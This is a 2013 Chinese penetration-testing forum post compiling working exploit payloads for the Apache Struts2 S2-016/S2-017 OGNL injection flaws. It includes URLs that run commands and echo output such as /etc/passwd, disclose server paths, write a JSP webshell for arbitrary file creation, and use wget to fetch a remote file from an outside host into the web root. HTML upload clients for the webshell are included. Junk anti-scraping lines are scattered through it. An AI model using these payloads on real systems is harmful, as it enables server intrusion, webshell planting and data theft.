中国网络渗透测试联盟
标题:
Struts2 S2-016/S2-017漏洞执行代码
[打印本页]
作者:
admin
时间:
2013-7-18 23:03
标题:
Struts2 S2-016/S2-017漏洞执行代码
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。
* y% q. s9 l" ^7 A3 \/ u3 @
& H$ X9 d" P" L. o
喜欢就点一下感谢吧^_^
8 F0 |" [0 m. D' O: U3 A
" z7 `1 H5 r$ j' O
带回显命令执行:
/ L" [2 f6 J! q1 x6 S9 T
! {3 V7 ]" v( R9 x$ \
http://www.example.com/struts2-blank/example/X.action?redirect:
${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
5 K. x* }6 h# ]4 z* U3 R5 O3 g
$ d7 { l+ j4 [ M5 X( |
6 }3 L5 V9 ?* L- {% r
) [6 \9 K- v; p7 d
- b1 I! n* P5 y8 n7 ?) d6 }
& R( l6 \( R" S5 o6 M( k
8 V# E- t, y9 Y
- G7 `2 _9 s7 y' j9 C
爆路径:
* G' l: M' o1 P+ }8 f; E5 j# o
3 j7 c+ Q; s3 z# c8 e
http://www.example.com/struts2-b ... 8%29.close%28%29%7D
3 M3 o& V$ V% I0 L& O* K c
6 { {+ R) J: R. `6 e: X
; q4 o3 H6 A* |/ ?" [5 z
S0 @' A4 H/ A6 _4 A9 B6 t: Z/ p" Y+ s
9 V8 T: C) Y1 ?' \
0 ~5 t+ o" ?0 W/ J& ~
写文件:
6 [8 X( t5 l. J( g" C. o
( o' [ q3 x) w- K8 A! t9 o
http://www.example.com/struts2-blank/example/X.action?redirect:
${
& ~5 b% G) B% X% O+ @7 O' |% Z/ Y
& R7 L* M9 u7 F
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
+ H! I4 x8 U: k" s# E C
8 P3 Z# Y( d7 o7 t) y. B- R, x
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
7 r0 a9 r, f4 Y8 m
2 M- s, y; S7 q
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
_- L. ?3 z% T
: e7 M. R# H3 L/ a1 H" h
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
; c/ r$ Y9 F( \/ ^
! ^0 W6 d) [* j- p: @
0 A* k: b$ z i. ]: T- [& S9 O
$ i. _' t) I5 P9 M, M3 j
写入的文件内容:
' J. k6 e+ y0 \' L1 h
6 l y; k! v1 [: ~$ z. {8 `+ I) s
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
6 A# E1 X- i! `8 A: p/ _. F9 j
5 S+ x5 F9 i; d- m( L' ]: a+ }
其实就是一个jsp的小马,需要客户端配合
* |7 b# k" J) a' c G
5 G! [$ h; R1 Q3 V
函数f是文件名,t是内容
) Z+ b m1 t$ m- |1 U* a8 ^
$ i$ n4 \: |* ?3 b
客户端:
0 S8 L- {1 O' Y+ a% o) T+ d
G1 R1 o' V T& j. ]4 j$ A2 e
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
" V& s% o( H7 c+ e% K
1 W! N. M2 K% n8 A: G( ^8 \
<textarea name=t cols=120 rows=10 width=45>your code</textarea>
+ u0 Y6 [& e* n6 z; W
& T. M. g6 s) b) o+ n$ b/ E+ V
<center>
( f, R# Q, @( [
5 ^# i: X$ P6 H& C% B3 m/ _
9 K5 o( {- N# i; s4 k, _0 B
$ k" ?6 j& M9 i( i' V& O, E
<input type=submit value="提交">
% r, h6 s: E' ? V; T' ]! Y: Z
3 f6 N5 C" n/ q9 q* p( ^
</form>
* W+ _; r+ L3 \2 @; ]* F, K
- S4 X2 S" j6 ]; f6 |
就在当前目录建立一个fjp.jsp
5 [# z# k- ^" j5 {8 j; V
& a8 V' p& P% A5 J6 e7 C* y
shell:
http://www.example.com/struts2-blank/example/fjp.jsp
% j* m0 O; Z5 P5 Z7 T8 H" t
0 M+ {0 }6 q/ `$ w& x
" X+ ]0 W- E0 j ]" `
% P& c+ T: ?- r. S
还有@园长的一个客户端:
- n. a/ D" d5 ~ q2 E! l
) M% a! c8 X' f& i: v6 N; ?9 m& j% ?
<html>
9 g$ b7 H: Y3 d1 a
$ F m7 R: A$ [) j W
<head>
4 ~/ a$ _6 ?1 b4 D' R7 v
2 q9 G' I4 `8 o& y+ k
<meta http-equiv="content-type" content="text/html;charset=utf-8">
! s5 H4 W- U7 w( g. n# Y) a. \
- S: e: \3 d+ c. p5 |9 u7 W. k
<title>jsp-园长</title>
/ ^$ k, Z8 }6 T' o
7 n$ q2 Q1 H9 x7 Q2 V6 f# J
</head>
, E3 [+ R& Q; S3 _% E( z4 p
- |7 D) V, z$ G; K
<style>
1 e* Q; d* l+ Y0 Z# ]' o4 q) w
0 Q- G7 P3 Z4 ?9 {; F/ t( M9 N v: F
.main{width:980px;height:600px;margin:0 auto;}
) L1 s4 Y- L4 i R# K# }
0 Y3 x. R1 E4 d- n1 s( C
.url{width:300px;}
7 Y7 h- Z% E7 E0 G7 W. j
& `* z8 r7 V5 e8 H8 O
.fn{width:60px;}
. A1 l* g' d/ E) J1 M; W
0 U7 H' f% s. H0 A8 K3 ]
.content{width:80%;height:60%;}
1 [: G% q( o# |- y
/ D' O% G5 q, [. A; h4 m L3 S6 h
</style>
/ l/ \- J! z @( R
0 t! Q. t, {. R2 N
<script>
2 d. M* I* F' D0 q9 q' p
J: C, L+ A3 N; f4 B
function upload(){
, q# c P; W- q1 T8 d
: E! {3 \. r( A/ S. D/ F! P8 y
var url = document.getElementById('url').value,
2 u4 {6 B5 d0 W
* W ~! N7 N8 L
content = document.getElementById('content').value,
% N% v* R" B3 ?0 B
* g& T) i+ P9 ~- t7 F
fileName = document.getElementById('fn').value,
: `, v: P3 Q/ f; j0 Y/ d: E
" B# s+ b# N( I2 V: p( d0 Z! g) B
form = document.getElementById('fm');
9 }# e4 Y/ ^; Q+ s5 e- }8 x, l
5 I' y- o2 M; Z1 V0 a+ h9 |
if(url.length == 0){
( |2 \, v* C8 v* R, y
! A' {, _& h; A" O/ L# x
alert("Url not allowd empty!");
6 f! V' P( ?* n5 `: t3 J! ?
: K8 e$ y" W8 I2 b, r
return ;
' o' r! d& g; K; h- ~+ U, r2 e
* Z1 ^" z8 w9 T6 ~6 M- M( m
}
* F, E9 L' e K4 J N, \
3 ~; ^ ~; Z* q& R
if(content.length == 0){
' k0 ?7 t K6 o% Y2 s3 h
& X/ Z0 m* I7 O# I' b/ G
alert("Content not allowd empty!");
# [: ~+ d# `" t# |( g' X' b
6 D% A- [2 ^. h, |0 M! K( i
return ;
4 S* F& o/ L( \
' Y; I2 J7 t7 T' H- ], N
}
. q: C& c$ @/ V, C- N
F) w3 |, m* {' z9 j- a
if(fileName.length == 0){
" ~* V2 x2 Q* c3 J) |
+ o4 ?2 `- G! B; W4 t- p
alert("FileName not allowd empty!");
6 z1 m& u- V6 |. ^8 \
" p* W7 J- f% c: K
return ;
4 _9 D2 f, |1 n% x4 w6 ?" G
0 H- t2 W( J" w, L
}
# H2 u+ M5 I; s; A+ U( y
% d2 |6 z4 H. j) y5 ?3 Q
form.action = url;
3 D" j0 l1 ?2 d
4 ~: \& `$ e+ B7 T
form.submit();
8 I( @' ] e, l1 k; `
) D) n1 ^! d3 F
}
3 v- ^9 N6 F _
4 |) v: r+ S# v9 X( n$ D% Q
</script>
' H7 B+ T- v& l$ R2 y5 f( {
7 @2 Z5 h3 v F/ Q, Z1 j
<body>
1 U; p! J, u3 }7 v, s- I6 \
2 o! S; @- }/ C: E* u5 q
<div class="main">
! b+ {' {* J/ U0 {
N7 w; L) F' k% F. Z
<form id="fm" method="post">
. _4 w4 z& k) c
3 _/ x7 N0 \. _! a x
URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>
# i$ S- w& ~/ n; r. z! T: t- D( N
5 h% e9 K0 f1 Q! k
FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />
! s/ a8 ]+ J$ h* u7 k8 K
' p, ?0 @) N h0 @% j, T
<a href="javascript:upload();">Upload</a>
* F. `' b" g6 C
- m# d; Z7 I5 W; ?" a
* B8 ^# O: @; ?5 V
8 D1 ?# \4 Y- x( o0 k9 z
<textarea id="content" class="content" name="t" ></textarea>
3 ?( ]( N/ n/ U! x, e
3 c0 ]" m7 D: @) I& ~( V, G
</form>
: \( F$ ^+ B9 i6 y: z
+ z1 H1 v& [% B8 i
</div>
/ k( {% }6 x( v. y9 a: ]
- Z+ N! G& B) P1 ]
</body>
* |1 V% B+ P% f- j9 \' f8 `! s
& P% z- A e& @6 M2 X) }
</html>
5 k' f' H1 V8 j3 y% {# S
* ?% ~, ?1 p m; W; g" x& b% Y8 ?" }
$ Y1 A& {5 F% G
% C3 m7 |; p F: t
还有@X发的一个wget的getshell
, D. A0 e* t2 t5 M- j
( I* X% R" R$ R1 d) _, \
?redirect
{%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}
5 P8 J6 O* Z4 q0 k$ t
3 ?+ P# \( E5 Y' t) L4 @" b
)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
% p+ Q6 n" Z5 n9 ^; ]& R
复制代码
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2